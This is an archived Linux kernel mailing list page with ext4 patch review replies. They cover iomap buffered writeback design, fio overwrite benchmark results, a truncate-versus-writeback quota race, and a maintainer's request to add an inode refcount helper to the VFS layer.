initialization function for i_rsv_conversion_work based on the buffered
write path at initialization time, and then reinitialize the work
handler when changing the path via the ioctl that sets the journal
flag. That should be sufficient.
There are actually two reasons for this. First, we want to avoid
starting a journal handle in overwrite scenarios. Second, we want to
be able to query the extent locklessly without holding i_data_sem in
overwrite cases as well (note that ext4_es_lookup_extent() in
ext4_iomap_map_one_extent() is called with i_data_sem held).
I ran a set of benchmark tests in my VM, performing the following FIO
overwrite test on a 500GB ramdisk:
$fio -filename=/test_dir/foo -direct=0 -iodepth=8 -fsync=0 -rw=write \
-numjobs=1 -bs=4k -ioengine=io_uring -size=20G -uncached=1 \
-runtime=30 --ramp_time=5s -time_based -norandommap=0 \
-fallocate=none -overwrite=1 \
-group_reportin -name=test --output=/tmp/log
The results are as follows:
a: on a non-fragmented file
A: on a fragmented file [1]
b: no background metadata pressure
B: with background metadata pressure [2]
buffer_head | iomap pre-map w/o journal | iomap directly map
a+b: 680 691 690
a+B: 560 568 567
A+b: 637 633 579
A+B: 540 571 495
[1] The file is pre-fragmented such that each block occupies a separate
extent.
[2] A background fsstress process is running (only contains metadata
ops):
taskset -c 2 fsstress -c -d /test_dir -l 0 -n 1000 -f clonerange=0 \
-f copyrange=0 -f awrite=0 -f aread=0 -f dread=0 \
-f dwrite=0 -f mread=0 -f mwrite=0 -f readv=0 -f write=0 \
-f writev=0 -f read=0 -f sync=0 -f afsync=0 -f fsync=0
As can be seen, for large contiguous files, the performance impact is
minimal. However, in heavily fragmented scenarios or under other
metadata pressure, pre-querying the mapping brings noticeable gains.
However, this is testing the most extreme case — I'm not sure about
the real-world impact, so I don't have a strong preference either way.
But I suppose faster is better, at least not slower than the old
buffer_head path. :)
> then I'd
> probably prefer coming up with an ext4_get_blocks flag which tells it to
> start a transaction on its own if we need to allocate blocks... That would
> be much simpler than opencoding all this.
Additionally, there is a key point here. The reason I open-coded
ext4_iomap_map_writeback_range() is that we must ensure extent query
and allocation are performed atomically under i_data_sem. Otherwise,
concurrent truncate could lead to quota leaks.
Specifically, consider the following scenario: we call
ext4_map_blocks() to allocate blocks. Suppose there is a delalloc
extent covering blocks [0,3). While writeback is submitting block 0, a
concurrent truncate(block 1) occurs:
wb truncate
ext4_es_lookup_extent() ext4_truncate_down()
//get [0,3)
truncate_inode_pages_range()
//clear page 1&2
ext4_truncate()
down_write(i_data_sem)
ext4_es_remove_extent()
//drop extent [1,3)
//i_reserved_data_blocks: 3->1
up_write(i_data_sem)
down_write(i_data_sem)
ext4_map_create_blocks()
//alloc 3 blocks
ext4_es_insert_extent()
//only reclaim 1 block,stale 2 blocks
up_write(i_data_sem)
Therefore, If we don't open-coding this part, we would need to
significantly rework ext4_map_blocks(), which might have a larger
impact at this point. What do you think?
>
>> + if (ret < 0) {
>> + if (ext4_emergency_state(sb))
>> + return ret;
>> +
>> + /*
>> + * Retry transient ENOSPC errors, if
>> + * ext4_count_free_blocks() is non-zero, a commit
>> + * should free up blocks.
>> + */
>> + if (ret == -ENOSPC && journal && ext4_count_free_clusters(sb)) {
>> + jbd2_journal_force_commit_nested(journal);
>> + goto retry;
>> + }
>> +
>> + ext4_msg(sb, KERN_CRIT,
>> + "Delayed block allocation failed for inode %llu at logical offset %llu with max blocks %u with error %d",
>> + inode->i_ino, (unsigned long long)map.m_lblk,
>> + (unsigned int)map.m_len, -ret);
>> + ext4_msg(sb, KERN_CRIT,
>> + "This should not happen!! Data will be lost\n");
>> + if (ret == -ENOSPC)
>> + ext4_print_free_blocks(inode);
>> + return ret;
>> + }
>> +out:
>> + ext4_set_iomap(inode, &wpc->iomap, &map, offset, dirty_len, 0);
>> + return 0;
>> +}
>> +
>
> ...
>
>> +void ext4_iomap_end_bio(struct bio *bio)
>> +{
>> + struct iomap_ioend *ioend = iomap_ioend_from_bio(bio);
>> + struct inode *inode = ioend->io_inode;
>> + struct ext4_inode_info *ei = EXT4_I(inode);
>> + struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
>> + unsigned long flags;
>> +
>> + /* Needs to convert unwritten extents or update the i_disksize. */
>> + if ((ioend->io_flags & IOMAP_IOEND_UNWRITTEN) ||
>> + ioend->io_offset + ioend->io_size > READ_ONCE(ei->i_disksize))
>> + goto defer;
>> +
>> + /* Needs to abort the journal on data_err=abort. */
>> + if (unlikely(ioend->io_bio.bi_status))
>> + goto defer;
>> +
>> + iomap_finish_ioend(ioend, 0);
>> + return;
>> +defer:
>> + spin_lock_irqsave(&ei->i_completed_io_lock, flags);
>> + if (list_empty(&ei->i_iomap_ioend_list))
>> + queue_work(sbi->rsv_conversion_wq, &ei->i_iomap_ioend_work);
>> + list_add_tail(&ioend->io_list, &ei->i_iomap_ioend_list);
>> + spin_unlock_irqrestore(&ei->i_completed_io_lock, flags);
>> +}
>
> For now, I'd prefer to do what XFS does and offload everything. Then you
> don't have to export iomap_finish_ioend() (which would need to be in a
> separate patch and acked by iomap maintainers) and the code is more
> standard. There's a patchset in the works which adds general ioend offloading
> infrastructure into iomap [1] and when that lands we should get all these
^^^^^ block layer?
> bells and whistles (even better ones with percpu work queues, batching,
> etc.) for free.
>
> [1] https://lore.kernel.org/all/20260514-blk-dontcache-v6-0-782e2fa7477b@columbia.edu/
>
> Honza
Ha, I've noticed this patchset, so I haven't implemented
uncached I/O handling for now. As a side note, I have a question:
if we convert all endio processing to worker threads, IIRC, my
recollection from previous performance tests is that pure overwrite
scenarios would see at least a 20% degradation. Is that acceptable?
I understand why uncached I/O might need the entire completion path
in a worker, but can we complete the I/O in interrupt context for
pure overwrite and then release the page cache in a worker? Must
page cache invalidation and I/O completion be synchronous?
The reason I kept ext4_iomap_end_bio() handling I/O completion in
interrupt context is for overwrite performance. XFS also handles
overwrites in interrupt context (via ioend_writeback_end_bio()).
However, ext4 has the data_error=abort mount option — when this mode
is set and an I/O error occurs, we must abort the journal in a
worker. Since we cannot predict I/O errors at submission time, we
can't directly use ioend_writeback_end_bio() and must instead bind
our own ext4_iomap_end_bio(). At the same time, I want to avoid
spawning a worker for pure overwrites when no I/O error occurs, so I
exported iomap_finish_ioend(). What do you think?
Thanks,
Yi.
^ permalink raw reply
* Re: [PATCH v7 3/4] ext4: introduce ext4_put_ea_inode() for safe deferred iput
From: Jan Kara @ 2026-06-22 10:44 UTC (permalink / raw)
To: Zhou, Yun
Cc: Jan Kara, tytso, adilger.kernel, libaokun, ojaswin, ritesh.list,
yi.zhang, linux-ext4, linux-kernel
In-Reply-To: <f9c2c9a3-c68d-4c1c-b399-656068ef472e@windriver.com>
On Mon 22-06-26 18:06:23, Zhou, Yun wrote:
> Hi Honza,
>
> On 6/18/26 02:42, Jan Kara wrote:
> >
> > Allocating ext4_ea_iput_entry for dropping each inode is somewhat wasteful.
> > I want to suggest another scheme (somewhat more involved but more efficient
> > scheme):
> >
> > 1) Create a VFS helper bool iput_if_not_last(struct inode *inode) which
> > drops inode reference if it is not the last one (and returns true in that
> > case). Basically:
> >
> > bool iput_if_not_last(struct inode *inode)
> > {
> > return atomic_add_unless(&inode->i_count, -1, 1);
> > }
> >
> > This needs to be a separate patch as it should get vetting from VFS
> > maintainers.
> After taking a closer look, it seems that this function doesn't need to be
> added to the VFS layer — at least not for now. For example, we could
> directly inline atomic_add_unless() into ext4_put_ea_inode():
>
> void ext4_put_ea_inode(struct super_block *sb, struct inode *inode)
> {
> if (!inode)
> return;
> if (atomic_add_unless(&inode->i_count, -1, 1))
> return;
> llist_add(&EXT4_I(inode)->i_ea_iput_node,
> &EXT4_SB(sb)->s_ea_inode_to_free);
> schedule_delayed_work(&EXT4_SB(sb)->s_ea_inode_work, 1);
> }
>
> This way, we avoid submitting an isolated patch to the VFS layer that
> currently has only one user (ext4). If there is indeed a real need for it in
> the future, we can always submit a follow-up patch to refactor it.
>
> What do you think?
No, please provide a proper helper in VFS for this. We don't really want
filesystems to play games with inode refcount without proper abstraction in
VFS. That causes longterm maintenance issues.
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox